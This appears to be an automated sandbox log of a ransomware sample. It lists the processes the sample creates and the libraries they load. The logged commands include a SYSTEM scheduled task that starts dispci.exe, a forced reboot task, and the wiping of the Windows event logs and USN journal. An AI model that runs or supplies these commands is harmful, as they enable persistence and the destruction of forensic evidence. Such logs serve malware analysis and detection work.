          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: LisectAVT_2403002C_35.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeFile read: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe "C:\Users\user\Desktop\LisectAVT_2403002C_35.exe"
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\D99F.tmp "C:\Windows\D99F.tmp" \\.\pipe\{0196DA97-052C-4D78-8175-28281F8F1CD9}
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
          Source: C:\Windows\D99F.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1283680486 && exit
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 1283680486
          Source: C:\Windows\dispci.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\dispci.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x4 /state0:0xa3f80855 /state1:0x41c64e6d
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
          Source: unknownProcess created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
          Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f8d855 /state1:0x41c64e6d
          Source: unknownProcess created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegalJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\D99F.tmp "C:\Windows\D99F.tmp" \\.\pipe\{0196DA97-052C-4D78-8175-28281F8F1CD9}Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogonJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SetupJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SystemJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SecurityJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl ApplicationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 1283680486 Jump to behavior
          Source: C:\Windows\dispci.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegalJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogonJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usosvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: updatepolicy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usocoreps.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usoapi.dllJump to behavior
          Source: C:\Windows\D99F.tmpSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.logon.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wincorlib.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xamlhost.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: mrmcorer.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windowmanagementapi.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: inputhost.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: languageoverlayutil.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.immersive.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: directmanipulation.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
